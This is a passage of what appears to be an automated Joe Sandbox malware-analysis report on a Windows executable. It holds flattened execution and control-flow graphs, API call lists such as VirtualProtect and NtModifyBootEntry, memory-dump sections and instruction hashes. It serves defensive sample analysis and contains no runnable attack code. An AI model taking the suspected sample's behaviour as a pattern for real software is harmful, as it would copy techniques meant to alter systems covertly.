calls 4397->4398 4399 7ff7ca3815b7 4398->4399 4400 7ff7ca381394 2 API calls 4399->4400 4401 7ff7ca3815c6 4400->4401 4402 7ff7ca381394 2 API calls 4401->4402 4403 7ff7ca3815d5 4402->4403 4404 7ff7ca3815e4 4403->4404 4405 7ff7ca381394 2 API calls 4403->4405 4406 7ff7ca381394 2 API calls 4404->4406 4405->4404 4407 7ff7ca3815f3 4406->4407 4407->3746 4409 7ff7ca381394 2 API calls 4408->4409 4410 7ff7ca3815d5 4409->4410 4411 7ff7ca3815e4 4410->4411 4412 7ff7ca381394 2 API calls 4410->4412 4413 7ff7ca381394 2 API calls 4411->4413 4412->4411 4414 7ff7ca3815f3 4413->4414 4414->3747 4448 7ff7ca381000 4449 7ff7ca38108b __set_app_type 4448->4449 4450 7ff7ca381040 4448->4450 4451 7ff7ca3810b6 4449->4451 4450->4449 4452 7ff7ca3810e5 4451->4452 4454 7ff7ca381e00 4451->4454 4455 7ff7ca387ce0 __setusermatherr 4454->4455 4456 7ff7ca381800 4457 7ff7ca381812 4456->4457 4458 7ff7ca381835 fprintf 4457->4458 4474 7ff7ca382320 strlen 4475 7ff7ca382337 4474->4475 4492 7ff7ca381f47 4493 7ff7ca381e67 signal 4492->4493 4496 7ff7ca381e99 4492->4496 4494 7ff7ca381e7c 4493->4494 4493->4496 4495 7ff7ca381e82 signal 4494->4495 4494->4496 4495->4496 2760 7ff7ca381394 2764 7ff7ca387750 2760->2764 2762 7ff7ca3813b8 2763 7ff7ca3813c6 NtAllocateVirtualMemoryEx 2762->2763 2765 7ff7ca38776e 2764->2765 2768 7ff7ca38779b 2764->2768 2765->2762 2766 7ff7ca387843 2767 7ff7ca38785f malloc 2766->2767 2769 7ff7ca387880 2767->2769 2768->2765 2768->2766 2769->2765 4476 7ff7ca381ab3 4477 7ff7ca381a70 4476->4477 4477->4476 4478 7ff7ca381b36 4477->4478 4479 7ff7ca38199e 4477->4479 4483 7ff7ca381b53 4477->4483 4481 7ff7ca381ba0 4 API calls 4478->4481 4480 7ff7ca381a0f 4479->4480 4482 7ff7ca3819e9 VirtualProtect 4479->4482 4481->4483 4482->4479 4428 7ff7ca381a70 4429 7ff7ca38199e 4428->4429 4431 7ff7ca381a7d 4428->4431 4430 7ff7ca381a0f 4429->4430 4433 7ff7ca3819e9 VirtualProtect 4429->4433 4431->4428 4432 7ff7ca381b53 4431->4432 4434 7ff7ca381b36 4431->4434 4433->4429 4435 7ff7ca381ba0 4 API calls 4434->4435 4435->4432 4459 7ff7ca381e10 4460 7ff7ca381e2f 4459->4460 4461 7ff7ca381ecc 4460->4461 4464 7ff7ca381e55 4460->4464 4465 7ff7ca381eb5 4460->4465 4462 7ff7ca381ed3 signal 4461->4462 4461->4465 4463 7ff7ca381ee4 4462->4463 4462->4465 4463->4465 4466 7ff7ca381eea signal 4463->4466 4464->4465 4467 7ff7ca381f12 signal 4464->4467 4466->4465 4467->4465 4505 7ff7ca382050 4506 7ff7ca38205e EnterCriticalSection 4505->4506 4507 7ff7ca3820cf 4505->4507 4508 7ff7ca3820c2 LeaveCriticalSection 4506->4508 4509 7ff7ca382079 4506->4509 4508->4507 4509->4508 4510 7ff7ca3820bd free 4509->4510 4510->4508 4511 7ff7ca381fd0 4512 7ff7ca382033 4511->4512 4513 7ff7ca381fe4 4511->4513 4513->4512 4514 7ff7ca381ffd EnterCriticalSection LeaveCriticalSection 4513->4514 4514->4512 4436 7ff7ca38216f 4437 7ff7ca382178 InitializeCriticalSection 4436->4437 4438 7ff7ca382185 4436->4438 4437->4438

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: 1f0c5cd89db2a0e226b3a7e11c31de7610b439b18b75d8784ee5a5e0c905799d
                                                        • Instruction ID: a39dcb9011f5d0c924c79cde526af56cdb59a10207c520b0bf4bd23e25d40d45
                                                        • Opcode Fuzzy Hash: 1f0c5cd89db2a0e226b3a7e11c31de7610b439b18b75d8784ee5a5e0c905799d
                                                        • Instruction Fuzzy Hash: 0E515971E1960685FB11BF25F974379E3A2AF44BA2FC050BBD94E473A1DF2CA4818360

                                                        Control-flow Graph

                                                        APIs
                                                        • NtAllocateVirtualMemoryEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CA381156), ref: 00007FF7CA3813F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 6acfa36f2e860ca0d1eeb73f57069e439c4ee3338a0405080f720feb056bc57f
                                                        • Instruction ID: 4907cf57e76f3643faed06437c9b3f42fba6536f4c7fb4a1cff3450b31d58e92
                                                        • Opcode Fuzzy Hash: 6acfa36f2e860ca0d1eeb73f57069e439c4ee3338a0405080f720feb056bc57f
                                                        • Instruction Fuzzy Hash: 07F0C9B1D08B458AE610EF51F87006AF761FB48391B51487AEA9C47725CF3CE1509B60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$_wcsicmpmemcpy
                                                        • String ID:
                                                        • API String ID: 3717256989-3916222277
                                                        • Opcode ID: 8b30a7c2fa03572f7017c693f09e2e7eb4b4b66fd28fd6161ca957621421bddb
                                                        • Instruction ID: d54c9cea7f032a0ba10370bf633b684b5ad98a7d45e8699f3159bcb59a7a9e3c
                                                        • Opcode Fuzzy Hash: 8b30a7c2fa03572f7017c693f09e2e7eb4b4b66fd28fd6161ca957621421bddb
                                                        • Instruction Fuzzy Hash: 9143A561C1C6C284F311AF28B8753F4E361BF957A6F8452B6D9CD265A1EF6C62C4C328

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 8bf03da8fde18c3f48384b70ec27093f30c1343604dedd7ca0a9661a927418a4
                                                        • Instruction ID: ad8d79dcf2593657f6e65554f200210ee74325ff3f7bfd424955df98a4f9ba06
                                                        • Opcode Fuzzy Hash: 8bf03da8fde18c3f48384b70ec27093f30c1343604dedd7ca0a9661a927418a4
                                                        • Instruction Fuzzy Hash: EDB18C6190C6C285F321AF24F4253AAB7A0FF80795F80027AEACD57AA5DF7DD185CB14

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 01488000d68a8ab59d04e6865e1b22ecddd291ab305485b4cbbe7ecfcb7ac9ad
                                                        • Instruction ID: 40f4fc515e12870965988a3c165de9972851add93d8be98ed821ac8071b42a5f
                                                        • Opcode Fuzzy Hash: 01488000d68a8ab59d04e6865e1b22ecddd291ab305485b4cbbe7ecfcb7ac9ad
                                                        • Instruction Fuzzy Hash: D002A362908B8185F720AF15F8243AAB7A1FB847A5F80427ADAED137E5DF3CD185C714

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF7CA3893E8,00007FF7CA3893E8,?,?,00007FF7CA380000,?,00007FF7CA381991), ref: 00007FF7CA381C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF7CA3893E8,00007FF7CA3893E8,?,?,00007FF7CA380000,?,00007FF7CA381991), ref: 00007FF7CA381CC7
                                                        • memcpy.MSVCRT ref: 00007FF7CA381CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF7CA3893E8,00007FF7CA3893E8,?,?,00007FF7CA380000,?,00007FF7CA381991), ref: 00007FF7CA381D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 716313809d7e085c12c1575cdce3c3800b6d9d2193e088841cc148fe0cd95883
                                                        • Instruction ID: f3e97e30142c4b0c81d3506f576d5e139eb50d2abc3464a32cc5f3ffe6e0eaa8
                                                        • Opcode Fuzzy Hash: 716313809d7e085c12c1575cdce3c3800b6d9d2193e088841cc148fe0cd95883
                                                        • Instruction Fuzzy Hash: 1A41B371A09A4691FA20AF41F4746B8A7A1FB44FE2F9441BBDD1E43391DE3CE585C320

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 64c81d714b45f07d50bdf4d52e7b3bb64b2b63a861827c6e76927b0b7ee1a192
                                                        • Instruction ID: 1a4344346f1c523564256b745143360ea2865aa72b5ab00047a3aac18b1ead82
                                                        • Opcode Fuzzy Hash: 64c81d714b45f07d50bdf4d52e7b3bb64b2b63a861827c6e76927b0b7ee1a192
                                                        • Instruction Fuzzy Hash: C8213321A0990281F655BF81F57437492A1FF04FB2FC000B6D95F57AA1CF2CA8818328

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 592 7ff7ca381e10-7ff7ca381e2d 593 7ff7ca381e3e-7ff7ca381e48 592->593 594 7ff7ca381e2f-7ff7ca381e38 592->594 596 7ff7ca381e4a-7ff7ca381e53 593->596 597 7ff7ca381ea3-7ff7ca381ea8 593->597 594->593 595 7ff7ca381f60-7ff7ca381f69 594->595 598 7ff7ca381ecc-7ff7ca381ed1 596->598 599 7ff7ca381e55-7ff7ca381e60 596->599 597->595 600 7ff7ca381eae-7ff7ca381eb3 597->600 603 7ff7ca381f23-7ff7ca381f2d 598->603 604 7ff7ca381ed3-7ff7ca381ee2 signal 598->604 599->597 601 7ff7ca381efb-7ff7ca381f0a call 7ff7ca387cf0 600->601 602 7ff7ca381eb5-7ff7ca381eba 600->602 601->603 614 7ff7ca381f0c-7ff7ca381f10 601->614 602->595 605 7ff7ca381ec0 602->605 608 7ff7ca381f43-7ff7ca381f45 603->608 609 7ff7ca381f2f-7ff7ca381f3f 603->609 604->603 606 7ff7ca381ee4-7ff7ca381ee8 604->606 605->603 610 7ff7ca381f4e-7ff7ca381f53 606->610 611 7ff7ca381eea-7ff7ca381ef9 signal 606->611 608->595 613 7ff7ca381f5a 609->613 610->613 611->595 613->595 615 7ff7ca381f55 614->615 616 7ff7ca381f12-7ff7ca381f21 signal 614->616 615->613 616->595 616->603
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 2630db6486f5b991bc22551f89febb5c90dbce5cc3ede817fc3e9e42a387646c
                                                        • Instruction ID: 71bbcc4ceab73369d185313553f89b24000ddf84ec8955ff5d34634c93ddc481
                                                        • Opcode Fuzzy Hash: 2630db6486f5b991bc22551f89febb5c90dbce5cc3ede817fc3e9e42a387646c
                                                        • Instruction Fuzzy Hash: FF21C721F0D10642FA747E24B57437992929F84BB6FA582BFDD1D473D8CE6CA8C24360

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 617 7ff7ca381880-7ff7ca38189c 618 7ff7ca3818a2-7ff7ca3818f9 call 7ff7ca382420 call 7ff7ca382660 617->618 619 7ff7ca381a0f-7ff7ca381a1f 617->619 618->619 624 7ff7ca3818ff-7ff7ca381910 618->624 625 7ff7ca38193e-7ff7ca381941 624->625 626 7ff7ca381912-7ff7ca38191c 624->626 628 7ff7ca38194d-7ff7ca381954 625->628 629 7ff7ca381943-7ff7ca381947 625->629 627 7ff7ca38191e-7ff7ca381929 626->627 626->628 627->628 630 7ff7ca38192b-7ff7ca38193a 627->630 632 7ff7ca38199e-7ff7ca3819a6 628->632 633 7ff7ca381956-7ff7ca381961 628->633 629->628 631 7ff7ca381a20-7ff7ca381a26 629->631 630->625 634 7ff7ca381a2c-7ff7ca381a37 631->634 635 7ff7ca381b87-7ff7ca381b98 call 7ff7ca381d40 631->635 632->619 636 7ff7ca3819a8-7ff7ca3819c1 632->636 637 7ff7ca381970-7ff7ca38199c call 7ff7ca381ba0 633->637 634->632 638 7ff7ca381a3d-7ff7ca381a5f 634->638 639 7ff7ca3819df-7ff7ca3819e7 636->639 637->632 642 7ff7ca381a7d-7ff7ca381a97 638->642 644 7ff7ca3819e9-7ff7ca381a0d VirtualProtect 639->644 645 7ff7ca3819d0-7ff7ca3819dd 639->645 647 7ff7ca381a9d-7ff7ca381afa 642->647 648 7ff7ca381b74-7ff7ca381b82 call 7ff7ca381d40 642->648 644->645 645->619 645->639 654 7ff7ca381afc-7ff7ca381b0e 647->654 655 7ff7ca381b22-7ff7ca381b26 647->655 648->635 656 7ff7ca381b5c-7ff7ca381b6c 654->656 657 7ff7ca381b10-7ff7ca381b20 654->657 658 7ff7ca381b2c-7ff7ca381b30 655->658 659 7ff7ca381a70-7ff7ca381a77 655->659 656->648 661 7ff7ca381b6f call 7ff7ca381d40 656->661 657->655 657->656 658->659 660 7ff7ca381b36-7ff7ca381b57 call 7ff7ca381ba0 658->660 659->632 659->642 660->656 661->648
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CA381247), ref: 00007FF7CA3819F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 526722fdec3aa6cb244c57f22067a962d7ffc6e2d40cebe4475ac13535e1ccff
                                                        • Instruction ID: f584daf039e151a9ba43dac45f4daba1e548effb21af84d8c44350a7242e6fe7
                                                        • Opcode Fuzzy Hash: 526722fdec3aa6cb244c57f22067a962d7ffc6e2d40cebe4475ac13535e1ccff
                                                        • Instruction Fuzzy Hash: 4751AF66F08542D6FB10AF25F8747B4A761AB14BB6F8441BAD92D03794CF3CE581C720

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 665 7ff7ca381800-7ff7ca381810 666 7ff7ca381824 665->666 667 7ff7ca381812-7ff7ca381822 665->667 668 7ff7ca38182b-7ff7ca381867 call 7ff7ca382290 fprintf 666->668 667->668
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: 26ad7c6bd2757c174c7e5e4dd364a8a254158d3a940a9eb0d20a62be987e04bc
                                                        • Instruction ID: 5e9c77e60d131aa5b76b94357acfd969a47ca4b430ca33f4580edf0fd53c45af
                                                        • Opcode Fuzzy Hash: 26ad7c6bd2757c174c7e5e4dd364a8a254158d3a940a9eb0d20a62be987e04bc
                                                        • Instruction Fuzzy Hash: F4F0C211E18A4582F610BF28F9610B9E360EF493E2F90927ADE4D93251DF2CE1828310

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2109317567.00007FF7CA381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CA380000, based on PE: true
                                                        • Associated: 00000000.00000002.2109294663.00007FF7CA380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109362540.00007FF7CA388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109384729.00007FF7CA38A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109403004.00007FF7CA38B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109649849.00007FF7CA601000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2109665454.00007FF7CA603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7ca380000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 6d0c985be9a2a72991ea91204b00c04895ff73dfa6c18d1ec6811a33520b9b45
                                                        • Instruction ID: c57e066768ec573d402189cf2268048ffea1f8b54668e6bd62c697f15eb4a580
                                                        • Opcode Fuzzy Hash: 6d0c985be9a2a72991ea91204b00c04895ff73dfa6c18d1ec6811a33520b9b45
                                                        • Instruction Fuzzy Hash: 99011E25A0990281FA55AF95FD3427492A1BF04FB2FD400BADA1E13A90DF2CA8918328

                                                        Execution Graph

                                                        Execution Coverage:3.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1710
                                                        Total number of Limit Nodes:2
                                                        execution_graph 2794 7ff7794e1394 2798 7ff7794e7750 2794->2798 2796 7ff7794e13b8 2797 7ff7794e13c6 NtModifyBootEntry 2796->2797 2799 7ff7794e776e 2798->2799 2800 7ff7794e779b 2798->2800 2799->2796 2800->2799 2801 7ff7794e7843 2800->2801 2802 7ff7794e785f malloc 2801->2802 2803 7ff7794e7880 2802->2803 2803->2799 4536 7ff7794e1ab3 4539 7ff7794e1a70 4536->4539 4537 7ff7794e1b36 4540 7ff7794e1ba0 4 API calls 4537->4540 4538 7ff7794e199e 4541 7ff7794e1a0f 4538->4541 4543 7ff7794e19e9 VirtualProtect 4538->4543 4539->4536 4539->4537 4539->4538 4542 7ff7794e1b53 4539->4542 4540->4542 4543->4538 4483 7ff7794e1a70 4485 7ff7794e199e 4483->4485 4487 7ff7794e1a7d 4483->4487 4484 7ff7794e1a0f 4485->4484 4486 7ff7794e19e9 VirtualProtect 4485->4486 4486->4485 4487->4483 4488 7ff7794e1b36 4487->4488 4490 7ff7794e1b53 4487->4490 4489 7ff7794e1ba0 4 API calls 4488->4489 4489->4490 4507 7ff7794e1e10 4508 7ff7794e1e2f 4507->4508 4509 7ff7794e1e55 4508->4509 4510 7ff7794e1ecc 4508->4510 4513 7ff7794e1eb5 4508->4513 4509->4513 4515 7ff7794e1f12 signal 4509->4515 4511 7ff7794e1ed3 signal 4510->4511 4510->4513 4512 7ff7794e1ee4 4511->4512 4511->4513 4512->4513 4514 7ff7794e1eea signal 4512->4514 4514->4513 4515->4513 4560 7ff7794e2050 4561 7ff7794e20cf 4560->4561 4562 7ff7794e205e EnterCriticalSection 4560->4562 4563 7ff7794e20c2 LeaveCriticalSection 4562->4563 4564 7ff7794e2079 4562->4564 4563->4561 4564->4563 4565 7ff7794e20bd free 4564->4565 4565->4563 4566 7ff7794e1fd0 4567 7ff7794e1fe4 4566->4567 4568 7ff7794e2033 4566->4568 4567->4568 4569 7ff7794e1ffd EnterCriticalSection LeaveCriticalSection 4567->4569 4569->4568 4491 7ff7794e216f 4492 7ff7794e2185 4491->4492 4493 7ff7794e2178 InitializeCriticalSection 4491->4493 4493->4492 4570 7ff7794e1f47 4571 7ff7794e1e67 signal 4570->4571 4574 7ff7794e1e99 4570->4574 4572 7ff7794e1e7c 4571->4572 4571->4574 4573 7ff7794e1e82 signal 4572->4573 4572->4574 4573->4574 4516 7ff7794e2104 4517 7ff7794e2111 EnterCriticalSection 4516->4517 4518 7ff7794e2218 4516->4518 4520 7ff7794e220b LeaveCriticalSection 4517->4520 4524 7ff7794e212e 4517->4524 4519 7ff7794e2272 4518->4519 4521 7ff7794e2241 DeleteCriticalSection 4518->4521 4523 7ff7794e2230 free 4518->4523 4520->4518 4521->4519 4522 7ff7794e214d TlsGetValue GetLastError 